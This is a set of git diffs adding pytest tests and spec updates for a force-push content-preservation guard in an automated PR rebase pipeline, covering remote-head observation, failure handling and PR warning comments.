+                owner="o", repo="r", pr_number="42", branch="koan/fix",
+                base="main", full_repo="o/r", context={"url": ""},
+                project_path="/tmp", head_remote=None,
+                notify_fn=lambda m: None, skill_dir=None, actions_log=[],
+                push_state=push_state,
+            )
+
+        assert push_state["pushed_head"] == ""

--- a/koan/tests/test_rebase_pr.py
+++ b/koan/tests/test_rebase_pr.py
@@ -4671,6 +4671,43 @@ class TestPushWithFallbackGuardKeys:
             )
         assert result["pre_push_remote_heads"] == ["cafe" * 10]
 
+    def test_observations_of_a_failed_remote_are_not_reported(self):
+        """A tip seen on a remote whose push then failed was never overwritten;
+        reporting it would raise a false 'concurrent push clobbered' alarm."""
+        def mock_run(cmd, **kwargs):
+            if cmd[:2] == ["git", "push"] and "origin" in cmd:
+                raise RuntimeError("permission denied")
+            return MagicMock(returncode=0, stdout="", stderr="")
+
+        with patch("app.claude_step.subprocess.run", side_effect=mock_run), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 side_effect=["cafe" * 10, "cafe" * 10, "dead" * 10],
+             ):
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": ""}, "/project",
+            )
+        assert result["remote"] == "upstream"
+        assert result["pre_push_remote_heads"] == ["dead" * 10]
+
+    def test_unobservable_remote_is_flagged_not_assumed_clean(self):
+        """`ls-remote` failing is 'could not look', not 'nothing was there'."""
+        mock_result = MagicMock(returncode=0, stdout="", stderr="")
+        with patch("app.claude_step.subprocess.run", return_value=mock_result), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 return_value=None,
+             ):
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": ""}, "/project",
+            )
+        assert result["pre_push_remote_heads"] == []
+        assert result["observation_failed"] is True
+
     def test_failed_push_reports_no_pushed_head(self):
         """A SHA that never reached the remote must not be reported as pushed."""
         def mock_run(cmd, **kwargs):
@@ -4792,6 +4829,50 @@ class TestRunForcePushGuard:
         assert any("could not run" in a for a in log)
         assert notified == []
 
+    def test_unexpected_guard_exception_does_not_fail_the_rebase(self):
+        """The branch is already pushed by the time the guard runs: an
+        unexpected failure must not turn a completed rebase into a failed
+        mission or skip the PR comment that follows."""
+        log = []
+        with patch(
+            "app.rebase_pr.force_push_guard.verify_content_preserved",
+            side_effect=AttributeError("boom"),
+        ):
+            result = _run_force_push_guard(
+                pre_rebase_head="a" * 40,
+                target_ref="origin/main",
+                project_path="/project",
+                push_state={"remote": "origin", "pushed_head": "c" * 40},
+                branch="koan/fix",
+                pr_number="42",
+                actions_log=log,
+                notify_fn=lambda m: None,
+            )
+        assert result == ""
+        assert any("unexpected guard failure" in a for a in log)
+
+    def test_unexpected_render_exception_does_not_fail_the_rebase(self):
+        log = []
+        with patch(
+            "app.rebase_pr.force_push_guard.verify_content_preserved",
+            return_value="findings",
+        ), patch(
+            "app.rebase_pr.force_push_guard.build_push_warning",
+            side_effect=TypeError("boom"),
+        ):
+            result = _run_force_push_guard(
+                pre_rebase_head="a" * 40,
+                target_ref="origin/main",
+                project_path="/project",
+                push_state={"remote": "origin", "pushed_head": "c" * 40},
+                branch="koan/fix",
+                pr_number="42",
+                actions_log=log,
+                notify_fn=lambda m: None,
+            )
+        assert result == ""
+        assert any("unexpected guard failure" in a for a in log)
+
     def test_missing_baseline_skips(self):
         log = []
         result = _run_force_push_guard(
@@ -4824,9 +4905,9 @@ class TestGatePushStatePropagation:
 
         with patch("app.rebase_pr._push_with_fallback", return_value={
             "success": True,
-            "actions": ["Force-pushed `koan/fix` to upstream"],
+            "actions": ["Force-pushed `koan/fix` to origin"],
             "error": "",
-            "remote": "upstream",
+            "remote": "origin",
             "pre_push_remote_heads": ["obs1" * 10],
             "pushed_head": "new1" * 10,
         }), patch("app.private_review_gate.run_private_review_gate",
@@ -4841,9 +4922,48 @@ class TestGatePushStatePropagation:
                 push_state=push_state,
             )
 
-        assert push_state["remote"] == "upstream"
+        assert push_state["remote"] == "origin"
         assert push_state["pushed_head"] == "new1" * 10
         assert push_state["observations"] == ["pre0" * 10, "obs1" * 10]
+
+    def test_gate_push_to_another_remote_drops_stale_observations(self):
+        """Observations only describe the remote they were taken on. If the
+        gate lands somewhere else, the earlier tips belong to a branch this
+        pipeline never overwrote — keeping them would be a false clobber."""
+        push_state = {
+            "remote": "origin",
+            "pushed_head": "old0" * 10,
+            "observations": ["pre0" * 10],
+            "observation_failed": True,
+        }
+
+        def fake_gate(**kwargs):
+            kwargs["push_fn"]()
+            return SimpleNamespace(ran=True, summary="ok", skipped_reason="")
+
+        with patch("app.rebase_pr._push_with_fallback", return_value={
+            "success": True,
+            "actions": [],
+            "error": "",
+            "remote": "upstream",
+            "pre_push_remote_heads": ["obs1" * 10],
+            "observation_failed": False,
+            "pushed_head": "new1" * 10,
+        }), patch("app.private_review_gate.run_private_review_gate",
+                  side_effect=fake_gate), \
+             patch("app.utils.project_name_for_path", return_value="proj"):
+            from app.rebase_pr import _run_rebase_private_review_gate
+            _run_rebase_private_review_gate(
+                owner="o", repo="r", pr_number="42", branch="koan/fix",
+                base="main", full_repo="o/r", context={"url": ""},
+                project_path="/tmp", head_remote=None,
+                notify_fn=lambda m: None, skill_dir=None, actions_log=[],
+                push_state=push_state,
+            )
+
+        assert push_state["remote"] == "upstream"
+        assert push_state["observations"] == ["obs1" * 10]
+        assert push_state["observation_failed"] is False
 
     def test_gate_push_without_confirmed_sha_clears_pushed_head(self):
         """If the gate pushed but its SHA capture failed, the step-6 SHA is

--- a/koan/tests/test_rebase_pr.py
+++ b/koan/tests/test_rebase_pr.py
@@ -40,6 +40,7 @@ from app.rebase_pr import (
     _is_conflict_failure,
     _push_with_fallback,
     _rebase_with_conflict_resolution,
+    _run_force_push_guard,
     check_pr_state,
     _run_ci_check_and_fix,
     _run_ci_fix_step_with_timeout_retry,
@@ -2576,7 +2577,11 @@ class TestRunRebaseClaude:
              patch("app.rebase_pr._get_current_branch", return_value="main"), \
              patch("app.rebase_pr._checkout_pr_branch"), \
              patch("app.rebase_pr._rebase_with_conflict_resolution", return_value="origin"), \
-             patch("app.rebase_pr._run_git", side_effect=["abc123\n", ""]), \
+             patch(
+                 "app.rebase_pr._run_git",
+                 # pre-rebase head capture, rebase checkpoint, timeout-recovery reset
+                 side_effect=["def456\n", "abc123\n", ""],
+             ), \
              patch("app.rebase_pr._fix_existing_ci_failures", return_value=False), \
              patch("app.rebase_pr._enqueue_ci_check", return_value="CI queued"), \
              patch("app.rebase_pr._push_with_fallback", return_value={
@@ -4574,3 +4579,109 @@ class TestRebaseOutcomeGating:
         rp.run_rebase("o", "r", "7", "/tmp/x")
         assert not any("..." in m for m in sent)  # progress gated
         assert sent == ["✅ Rebased https://github.com/o/r/pull/7"]
+
+
+# ---------------------------------------------------------------------------
+# Force-push content-preservation guard integration
+# ---------------------------------------------------------------------------
+
+class TestPushGuardComment:
+    def test_section_rendered_at_top(self):
+        section = "> [!CAUTION]\n> content was dropped"
+        result = _build_rebase_comment(
+            "42", "koan/fix", "main",
+            ["Rebased onto origin/main", "Force-pushed `koan/fix` to origin"],
+            {"title": "Fix bug"},
+            diffstat="1 file changed",
+            push_guard_section=section,
+        )
+        assert section in result
+        # The guard alert comes before every other section of the comment.
+        assert result.index("[!CAUTION]") < result.index("### Stats")
+        assert result.index("[!CAUTION]") < result.index("<details>")
+
+    def test_no_section_by_default(self):
+        result = _build_rebase_comment(
+            "42", "koan/fix", "main",
+            ["Rebased onto origin/main"],
+            {"title": "Fix bug"},
+        )
+        assert "[!CAUTION]" not in result
+
+
+class TestPushWithFallbackGuardKeys:
+    def test_success_reports_remote_and_observed_head(self):
+        mock_result = MagicMock(returncode=0, stdout="", stderr="")
+        with patch("app.claude_step.subprocess.run", return_value=mock_result), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 return_value="cafe" * 10,
+             ) as observe:
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": "https://..."}, "/project",
+            )
+        assert result["success"] is True
+        assert result["remote"] == "origin"
+        assert result["pre_push_remote_head"] == "cafe" * 10
+        observe.assert_called_once_with("origin", "koan/fix", "/project")
+
+
+class TestRunForcePushGuard:
+    def _run(self, *, pre_rebase_head="a" * 40, findings="unused",
+             section="", actions_log=None, notify_calls=None):
+        actions_log = actions_log if actions_log is not None else []
+        notify_calls = notify_calls if notify_calls is not None else []
+        with patch(
+            "app.rebase_pr.force_push_guard.verify_content_preserved",
+            return_value=findings,
+        ), patch(
+            "app.rebase_pr.force_push_guard.build_push_warning",
+            return_value=section,
+        ):
+            result = _run_force_push_guard(
+                pre_rebase_head=pre_rebase_head,
+                target_ref="origin/main",
+                project_path="/project",
+                push_result={"remote": "origin", "pre_push_remote_head": "b" * 40},
+                branch="koan/fix",
+                pr_number="42",
+                actions_log=actions_log,
+                notify_fn=notify_calls.append,
+            )
+        return result, actions_log, notify_calls
+
+    def test_findings_produce_section_action_and_notification(self):
+        section = "> [!CAUTION]\n> boom"
+        result, log, notified = self._run(section=section)
+        assert result == section
+        assert any("Force-push guard" in a and "see the warning" in a for a in log)
+        assert len(notified) == 1
+        assert "PR #42" in notified[0]
+
+    def test_clean_check_logs_preserved(self):
+        result, log, notified = self._run(section="")
+        assert result == ""
+        assert any("verified preserved" in a for a in log)
+        assert notified == []
+
+    def test_guard_failure_is_non_fatal(self):
+        result, log, notified = self._run(findings=None, section="")
+        assert result == ""
+        assert any("could not run" in a for a in log)
+        assert notified == []
+
+    def test_missing_baseline_skips(self):
+        log = []
+        result = _run_force_push_guard(
+            pre_rebase_head="",
+            target_ref="origin/main",
+            project_path="/project",
+            push_result={},
+            branch="koan/fix",
+            pr_number="42",
+            actions_log=log,
+            notify_fn=lambda m: None,
+        )
+        assert result == ""
+        assert any("pre-rebase head was not captured" in a for a in log)

--- a/koan/tests/test_rebase_pr.py
+++ b/koan/tests/test_rebase_pr.py
@@ -5058,6 +5058,20 @@ def _commit_file(repo, name, content, message):
     _git_cmd(repo, "commit", "-m", message)
 
 
+def _make_repo_hermetic(repo):
+    """Pin identity/signing/hooks in *repo* so git works without a global config.
+
+    The rebase pipeline shells out to plain ``git``, so it inherits none of
+    ``_git_cmd``'s ``-c`` flags. On a CI runner there is no global identity and
+    the auto-detected one is rejected (``user@host.(none)``), which would fail
+    the replayed commits rather than the behaviour under test.
+    """
+    _git_cmd(repo, "config", "user.email", "t@t")
+    _git_cmd(repo, "config", "user.name", "t")
+    _git_cmd(repo, "config", "commit.gpgsign", "false")
+    _git_cmd(repo, "config", "core.hooksPath", str(repo / ".no-hooks"))
+
+
 class TestConcurrentPushDuringPrePushCiFix:
     """Step 5 (pre-push CI fix) is inside the guard's observation window.
 
@@ -5077,6 +5091,10 @@ class TestConcurrentPushDuringPrePushCiFix:
 
         seed = tmp_path / "seed"
         _git_cmd(tmp_path, "clone", str(bare), "seed")
+        _make_repo_hermetic(seed)
+        # An empty clone takes its branch name from init.defaultBranch on older
+        # git, so name it explicitly rather than inheriting the runner's setting.
+        _git_cmd(seed, "symbolic-ref", "HEAD", "refs/heads/main")
         _commit_file(seed, "a.txt", "one", "c1")
         _git_cmd(seed, "push", "origin", "main")
         _git_cmd(seed, "checkout", "-b", "feature")
@@ -5088,6 +5106,7 @@ class TestConcurrentPushDuringPrePushCiFix:
 
         work = tmp_path / "work"
         _git_cmd(tmp_path, "clone", str(bare), "work")
+        _make_repo_hermetic(work)
         return SimpleNamespace(bare=bare, seed=seed, work=work)
 
     def _context(self):
@@ -5143,7 +5162,7 @@ class TestConcurrentPushDuringPrePushCiFix:
                 "o", "r", "1", str(repos.work), notify_fn=MagicMock(),
             )
 
-        assert success is True
+        assert success is True, f"rebase pipeline failed: {summary}"
         comments = [a for a in posted if a[:2] == ("pr", "comment")]
         assert comments, "the pipeline must comment on the PR"
         body = comments[-1][-1]

--- a/koan/tests/test_rebase_pr.py
+++ b/koan/tests/test_rebase_pr.py
@@ -4708,6 +4708,48 @@ class TestPushWithFallbackGuardKeys:
         assert result["pre_push_remote_heads"] == []
         assert result["observation_failed"] is True
 
+    def test_observation_crash_does_not_block_the_push(self):
+        """The observation runs on the live push path. The guard detects and
+        warns — an unexpected failure inside it must not gate the push, divert
+        it to another remote, or fail the rebase."""
+        mock_result = MagicMock(returncode=0, stdout="", stderr="")
+        with patch("app.claude_step.subprocess.run", return_value=mock_result), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 side_effect=AttributeError("guard bug"),
+             ):
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": ""}, "/project",
+            )
+        assert result["success"] is True
+        assert result["remote"] == "origin"  # not diverted to the fallback
+        assert result["pushed_head"] == "beef" * 10
+        assert result["observation_failed"] is True
+
+    def test_lease_hook_crash_still_pushes_and_reports_unverified(self):
+        """Same on the lease-failure re-observation, which runs between the
+        rejected --force-with-lease and the plain --force."""
+        def mock_run(cmd, **kwargs):
+            if "--force-with-lease" in cmd:
+                raise RuntimeError("stale info")
+            return MagicMock(returncode=0, stdout="", stderr="")
+
+        with patch("app.claude_step.subprocess.run", side_effect=mock_run), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 side_effect=["cafe" * 10, RuntimeError("guard bug")],
+             ):
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": ""}, "/project",
+            )
+        assert result["success"] is True
+        assert result["pre_push_remote_heads"] == ["cafe" * 10]
+        assert result["observation_failed"] is True
+
     def test_failed_push_reports_no_pushed_head(self):
         """A SHA that never reached the remote must not be reported as pushed."""
         def mock_run(cmd, **kwargs):

--- a/koan/tests/test_rebase_pr.py
+++ b/koan/tests/test_rebase_pr.py
@@ -5041,3 +5041,112 @@ class TestGatePushStatePropagation:
             )
 
         assert push_state["pushed_head"] == ""
+
+
+def _git_cmd(cwd, *args):
+    """Run git in *cwd* with a deterministic identity, raising on failure."""
+    subprocess.run(
+        ["git", "-c", "user.email=t@t", "-c", "user.name=t",
+         "-c", "commit.gpgsign=false", *args],
+        cwd=str(cwd), check=True, capture_output=True, text=True,
+    )
+
+
+def _commit_file(repo, name, content, message):
+    (repo / name).write_text(content)
+    _git_cmd(repo, "add", name)
+    _git_cmd(repo, "commit", "-m", message)
+
+
+class TestConcurrentPushDuringPrePushCiFix:
+    """Step 5 (pre-push CI fix) is inside the guard's observation window.
+
+    ``_fix_existing_ci_failures`` amends the local commit and never pushes —
+    the pipeline's first force-push is Step 6, whose pre-push observation is
+    taken *after* Step 5 returns. A commit someone else lands while the CI fix
+    is running is therefore still observed, and named in the PR comment after
+    the force-push erases it.
+    """
+
+    @pytest.fixture
+    def repos(self, tmp_path):
+        """Bare remote + seed clone (the human) + work clone (the pipeline)."""
+        bare = tmp_path / "remote.git"
+        bare.mkdir()
+        _git_cmd(bare, "init", "--bare", "-b", "main", ".")
+
+        seed = tmp_path / "seed"
+        _git_cmd(tmp_path, "clone", str(bare), "seed")
+        _commit_file(seed, "a.txt", "one", "c1")
+        _git_cmd(seed, "push", "origin", "main")
+        _git_cmd(seed, "checkout", "-b", "feature")
+        _commit_file(seed, "f1.txt", "f1", "feature work")
+        _git_cmd(seed, "push", "origin", "feature")
+        _git_cmd(seed, "checkout", "main")
+        _commit_file(seed, "b.txt", "two", "c2")
+        _git_cmd(seed, "push", "origin", "main")
+
+        work = tmp_path / "work"
+        _git_cmd(tmp_path, "clone", str(bare), "work")
+        return SimpleNamespace(bare=bare, seed=seed, work=work)
+
+    def _context(self):
+        return {
+            "title": "Fix auth",
+            "body": "",
+            "branch": "feature",
+            "base": "main",
+            "state": "OPEN",
+            "author": "",
+            "url": "https://github.com/o/r/pull/1",
+            "diff": "",
+            "review_comments": "",
+            "reviews": "",
+            "issue_comments": "",
+            "head_owner": "o",
+        }
+
+    def test_commit_landing_during_ci_fix_is_named_in_pr_comment(self, repos):
+        posted: list = []
+
+        def fake_gh(*args, **_kwargs):
+            posted.append(args)
+            return ""
+
+        def human_pushes_during_ci_fix(**_kwargs):
+            """The Step 5 CI fix runs while a human lands a commit on the PR."""
+            _git_cmd(repos.seed, "fetch", "origin")
+            _git_cmd(repos.seed, "checkout", "feature")
+            _commit_file(
+                repos.seed, "hotfix.txt", "urgent", "human hotfix mid-rebase",
+            )
+            _git_cmd(repos.seed, "push", "origin", "feature")
+            return False
+
+        gate_skipped = SimpleNamespace(
+            ran=False, summary="", skipped_reason="not a backend project",
+        )
+
+        with patch("app.rebase_pr.resolve_pr_location", return_value=("o", "r")), \
+             patch("app.rebase_pr.fetch_pr_context", return_value=self._context()), \
+             patch("app.rebase_pr._check_if_already_solved", return_value=(False, None)), \
+             patch("app.commit_conventions.get_project_commit_guidance", return_value=""), \
+             patch("app.rebase_pr._find_remote_for_repo", return_value="origin"), \
+             patch("app.rebase_pr._fix_existing_ci_failures",
+                   side_effect=human_pushes_during_ci_fix), \
+             patch("app.rebase_pr._enqueue_ci_check", return_value=""), \
+             patch("app.rebase_pr._get_diffstat", return_value=""), \
+             patch("app.rebase_pr.run_gh", side_effect=fake_gh), \
+             patch("app.private_review_gate.run_private_review_gate",
+                   return_value=gate_skipped):
+            success, summary = run_rebase(
+                "o", "r", "1", str(repos.work), notify_fn=MagicMock(),
+            )
+
+        assert success is True
+        comments = [a for a in posted if a[:2] == ("pr", "comment")]
+        assert comments, "the pipeline must comment on the PR"
+        body = comments[-1][-1]
+        assert "human hotfix mid-rebase" in body
+        assert "force-push" in body.lower()
+        assert "guard" in summary.lower()

--- a/koan/tests/test_rebase_pr.py
+++ b/koan/tests/test_rebase_pr.py
@@ -4610,9 +4610,10 @@ class TestPushGuardComment:
 
 
 class TestPushWithFallbackGuardKeys:
-    def test_success_reports_remote_and_observed_head(self):
+    def test_success_reports_remote_observed_and_pushed_heads(self):
         mock_result = MagicMock(returncode=0, stdout="", stderr="")
         with patch("app.claude_step.subprocess.run", return_value=mock_result), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
              patch(
                  "app.rebase_pr.force_push_guard.observe_remote_head",
                  return_value="cafe" * 10,
@@ -4624,6 +4625,7 @@ class TestPushWithFallbackGuardKeys:
         assert result["success"] is True
         assert result["remote"] == "origin"
         assert result["pre_push_remote_head"] == "cafe" * 10
+        assert result["pushed_head"] == "beef" * 10
         observe.assert_called_once_with("origin", "koan/fix", "/project")
 
 
@@ -4643,7 +4645,11 @@ class TestRunForcePushGuard:
                 pre_rebase_head=pre_rebase_head,
                 target_ref="origin/main",
                 project_path="/project",
-                push_result={"remote": "origin", "pre_push_remote_head": "b" * 40},
+                push_state={
+                    "remote": "origin",
+                    "pushed_head": "c" * 40,
+                    "observations": ["b" * 40],
+                },
                 branch="koan/fix",
                 pr_number="42",
                 actions_log=actions_log,
@@ -4677,7 +4683,7 @@ class TestRunForcePushGuard:
             pre_rebase_head="",
             target_ref="origin/main",
             project_path="/project",
-            push_result={},
+            push_state={},
             branch="koan/fix",
             pr_number="42",
             actions_log=log,
@@ -4685,3 +4691,41 @@ class TestRunForcePushGuard:
         )
         assert result == ""
         assert any("pre-rebase head was not captured" in a for a in log)
+
+
+class TestGatePushStatePropagation:
+    def test_gate_push_feeds_observation_into_push_state(self):
+        """push_gate_fix must surface its own fresh observation + pushed SHA
+        so the guard also covers the gate-push window (review finding #3)."""
+        push_state = {
+            "remote": "origin",
+            "pushed_head": "old0" * 10,
+            "observations": ["pre0" * 10],
+        }
+
+        def fake_gate(**kwargs):
+            kwargs["push_fn"]()  # the gate pushes a fix
+            return SimpleNamespace(ran=True, summary="ok", skipped_reason="")
+
+        with patch("app.rebase_pr._push_with_fallback", return_value={
+            "success": True,
+            "actions": ["Force-pushed `koan/fix` to upstream"],
+            "error": "",
+            "remote": "upstream",
+            "pre_push_remote_head": "obs1" * 10,
+            "pushed_head": "new1" * 10,
+        }), patch("app.private_review_gate.run_private_review_gate",
+                  side_effect=fake_gate), \
+             patch("app.utils.project_name_for_path", return_value="proj"):
+            from app.rebase_pr import _run_rebase_private_review_gate
+            _run_rebase_private_review_gate(
+                owner="o", repo="r", pr_number="42", branch="koan/fix",
+                base="main", full_repo="o/r", context={"url": ""},
+                project_path="/tmp", head_remote=None,
+                notify_fn=lambda m: None, skill_dir=None, actions_log=[],
+                push_state=push_state,
+            )
+
+        assert push_state["remote"] == "upstream"
+        assert push_state["pushed_head"] == "new1" * 10
+        assert push_state["observations"] == ["pre0" * 10, "obs1" * 10]

--- a/specs/components/comment-formatting.md
+++ b/specs/components/comment-formatting.md
@@ -4,7 +4,7 @@ title: "Component Spec — Comment Formatting (GitHub alert callouts)"
 description: "Design contract for build_alert(), the single constructor for GitHub alert callouts, plus the type→situation mapping and the parsimony rule every skill must follow."
 tags: [git-github, skills]
 created: 2026-07-10
-updated: 2026-07-17
+updated: 2026-08-14
 ---
 
 # Component Spec — Comment Formatting (GitHub alert callouts)
@@ -60,6 +60,9 @@ the single most important thing the reader must not miss.
 ## Consumers
 
 - `koan/app/rebase_pr.py` — WARNING when review feedback was dropped.
+- `koan/app/force_push_guard.py` — one CAUTION (content dropped / concurrent push
+  clobbered) or WARNING (content modified in-flight / post-push race) per rebase
+  comment, at the top; never more than one alert from the guard.
 - `koan/app/review_runner.py` — IMPORTANT when the branch moved mid-review.
 - `koan/app/review_runner.py` — IMPORTANT on `comment_replies` whose `action` is
   `needs_clarification` (rendering only; the JSON schema is unchanged). Other

--- a/specs/components/git-github.md
+++ b/specs/components/git-github.md
@@ -4,7 +4,7 @@ title: "Component Spec — Git & GitHub"
 description: "Design contract for everything touching git history or the GitHub API: branch/PR creation, sync, webhook/notification handling, and rebase/recreate/CI-fix workflows."
 tags: [git-github]
 created: 2026-06-27
-updated: 2026-07-16
+updated: 2026-08-14
 ---
 
 # Component Spec — Git & GitHub
@@ -12,7 +12,8 @@ updated: 2026-07-16
 **Modules:** `git_sync.py`, `git_auto_merge.py`, `github.py`, `github_url_parser.py`,
 `github_skill_helpers.py`, `github_config.py`, `github_notifications.py`,
 `github_command_handler.py`, `github_webhook.py`, `rebase_pr.py`, `recreate_pr.py`,
-`claude_step.py`, `remote_rename_detector.py`, `head_tracker.py`, `git_prep.py`
+`claude_step.py`, `remote_rename_detector.py`, `head_tracker.py`, `git_prep.py`,
+`force_push_guard.py`
 
 ## Purpose
 
@@ -34,6 +35,7 @@ workflows.
 | `claude_step.py::run_ci_fix_loop()` | Shared CI-fix loop; `use_polling` toggles polling vs single-shot recheck; caller supplies `prompt_builder`. |
 | `claude_step.py::_rebase_onto_target()` | Strict PR rebase: target is **only** `{base_remote}/{base}` (the remote matching the PR's base repo, resolved by `rebase_pr._find_remote_for_repo`); fails closed when no remote matches or the target fetch fails; always a plain `git rebase` (never `--onto`); post-rebase sanity gate before any push. Structured failure codes via `result_meta` (`no_base_remote` / `fetch_failed` / `rebase_failed` / `sanity_check_failed`). |
 | `claude_step.py::_verify_rebase_result()` | Post-rebase gate: branch must sit on the target's current tip and its unique-commit count (`rev-list --count target..HEAD`) must not grow vs the pre-rebase baseline. On violation the branch is hard-reset to its pre-rebase commit and the rebase reported failed — nothing is pushed. |
+| `force_push_guard.py` | Post-force-push content-preservation harness for the rebase pipeline. `observe_remote_head()` snapshots the remote branch tip (and fetches its objects) immediately before a force-push; `verify_content_preserved()` compares the pre-rebase PR head against the final pushed head (patch-id equivalence via `git cherry`, file-level cross-check, clobbered mid-rebase pushes, post-push `ls-remote` race check); `build_push_warning()` renders the findings as one amber/red `build_alert()` callout with the recoverable pre-rebase SHA. Best-effort by contract: any internal failure degrades to "no findings" and never blocks a push or fails the mission. |
 | `head_tracker.py` | Detects remote HEAD change (master→main), throttled 12h, state in `.head-tracker.json`. |
 | `github_url_parser.py` | Single PR/issue URL parsing path. |
 | `git_prep.py::prepare_project_branch()` | Pre-mission: fetch → **self-heal interrupted merge/rebase** → stash → checkout base → ff-only/reset to `<remote>/<base>`. Non-fatal; returns `PrepResult`. |
@@ -57,6 +59,20 @@ workflows.
   mission is recoverable; a polluted force-push is not (incident: PR #2309 — a rebase
   onto a 4-days-stale ref with the fork's 1,889-commits-behind `main` as cut point
   resurrected 33 already-merged commits and force-pushed them unchecked).
+- **Every rebase-pipeline force-push is followed by a content-preservation check.**
+  A force-push rewrites the PR branch; the guard (`force_push_guard.py`) verifies —
+  *after* the final push of the pipeline — that every change present on the
+  pre-rebase PR head survived (patch-id equivalent in the new history or already
+  merged on the base), that no commits pushed by others mid-rebase were clobbered,
+  and that the remote still points at what Kōan pushed (post-push `ls-remote` final
+  check — the race window Kōan cannot close, only detect). Any finding is surfaced
+  as a single amber/red `build_alert()` callout at the top of the rebase PR comment,
+  always naming the pre-rebase head SHA so the previous state is recoverable. The
+  guard **detects and warns; it never blocks**: it runs best-effort after the push,
+  degrades silently on its own errors, and never fails the mission (design agreed
+  with the humans on incident review: recoverability + loud detection, not a new
+  hard gate). Origin: confirmed incidents where a bot rebase force-push dropped
+  content from the original PR (cpanel-plugins PR #2771 discussion).
 - **Self-heal precedes stash.** An interrupted merge/rebase/cherry-pick/revert
   (or bare unmerged paths / stale `index.lock`) is auto-aborted before stashing,
   because git cannot stash a conflicted tree and the next step resets to the

--- a/specs/components/git-github.md
+++ b/specs/components/git-github.md
@@ -35,7 +35,7 @@ workflows.
 | `claude_step.py::run_ci_fix_loop()` | Shared CI-fix loop; `use_polling` toggles polling vs single-shot recheck; caller supplies `prompt_builder`. |
 | `claude_step.py::_rebase_onto_target()` | Strict PR rebase: target is **only** `{base_remote}/{base}` (the remote matching the PR's base repo, resolved by `rebase_pr._find_remote_for_repo`); fails closed when no remote matches or the target fetch fails; always a plain `git rebase` (never `--onto`); post-rebase sanity gate before any push. Structured failure codes via `result_meta` (`no_base_remote` / `fetch_failed` / `rebase_failed` / `sanity_check_failed`). |
 | `claude_step.py::_verify_rebase_result()` | Post-rebase gate: branch must sit on the target's current tip and its unique-commit count (`rev-list --count target..HEAD`) must not grow vs the pre-rebase baseline. On violation the branch is hard-reset to its pre-rebase commit and the rebase reported failed — nothing is pushed. |
-| `force_push_guard.py` | Post-force-push content-preservation harness for the rebase pipeline. `observe_remote_head()` snapshots the remote branch tip (and fetches its objects) immediately before a force-push; `verify_content_preserved()` compares the pre-rebase PR head against the final pushed head (patch-id equivalence via `git cherry`, file-level cross-check, clobbered mid-rebase pushes, post-push `ls-remote` race check); `build_push_warning()` renders the findings as one amber/red `build_alert()` callout with the recoverable pre-rebase SHA. Best-effort by contract: any internal failure degrades to "no findings" and never blocks a push or fails the mission. |
+| `force_push_guard.py` | Post-force-push content-preservation harness for the rebase pipeline. `observe_remote_head()` snapshots the remote branch tip (and fetches its objects) immediately before **every** pipeline push (main push and private-gate re-pushes — the gate feeds its observations back via `push_state`); `verify_content_preserved()` compares the pre-rebase PR head against the **last successfully pushed SHA** (never bare local HEAD): `git cherry` patch-id screening refined by content-level cross-checks (byte-identical files at both heads, verbatim survival of added lines — so upstream squash-merges and context-line drift count as preserved), a file-level dropped-changes check, clobbered mid-pipeline pushes, and a post-push `ls-remote` race check. Per-commit analysis is capped (`_MAX_ANALYZED`) with the cap reported, never silent. `build_push_warning()` renders the findings as one amber/red `build_alert()` callout with the recoverable pre-rebase SHA (full SHA, actual push remote). Best-effort by contract: any internal failure degrades to "no findings" and never blocks a push or fails the mission. |
 | `head_tracker.py` | Detects remote HEAD change (master→main), throttled 12h, state in `.head-tracker.json`. |
 | `github_url_parser.py` | Single PR/issue URL parsing path. |
 | `git_prep.py::prepare_project_branch()` | Pre-mission: fetch → **self-heal interrupted merge/rebase** → stash → checkout base → ff-only/reset to `<remote>/<base>`. Non-fatal; returns `PrepResult`. |
@@ -61,18 +61,26 @@ workflows.
   resurrected 33 already-merged commits and force-pushed them unchecked).
 - **Every rebase-pipeline force-push is followed by a content-preservation check.**
   A force-push rewrites the PR branch; the guard (`force_push_guard.py`) verifies —
-  *after* the final push of the pipeline — that every change present on the
-  pre-rebase PR head survived (patch-id equivalent in the new history or already
-  merged on the base), that no commits pushed by others mid-rebase were clobbered,
-  and that the remote still points at what Kōan pushed (post-push `ls-remote` final
-  check — the race window Kōan cannot close, only detect). Any finding is surfaced
-  as a single amber/red `build_alert()` callout at the top of the rebase PR comment,
-  always naming the pre-rebase head SHA so the previous state is recoverable. The
-  guard **detects and warns; it never blocks**: it runs best-effort after the push,
-  degrades silently on its own errors, and never fails the mission (design agreed
-  with the humans on incident review: recoverability + loud detection, not a new
-  hard gate). Origin: confirmed incidents where a bot rebase force-push dropped
-  content from the original PR (cpanel-plugins PR #2771 discussion).
+  *after* the final push of the pipeline, gate re-pushes included — that every
+  change present on the pre-rebase PR head survived. "Survived" is judged at the
+  content level, not by patch-id alone: a commit with no patch-id equivalent still
+  counts as preserved when its files are byte-identical at both heads (upstream
+  squash-merge) or every line it added exists verbatim at the pushed head
+  (context-line drift on a clean rebase) — patch-id misses that fail both checks
+  are what gets reported. The guard also verifies that no commits pushed by others
+  mid-pipeline were clobbered (each push is preceded by an `ls-remote` + fetch
+  observation, including the private gate's re-pushes), and that the remote still
+  points at the last SHA Kōan actually pushed (post-push `ls-remote` final check
+  against the recorded pushed SHA, never bare local HEAD — the race window Kōan
+  cannot close, only detect). Any finding is surfaced as a single amber/red
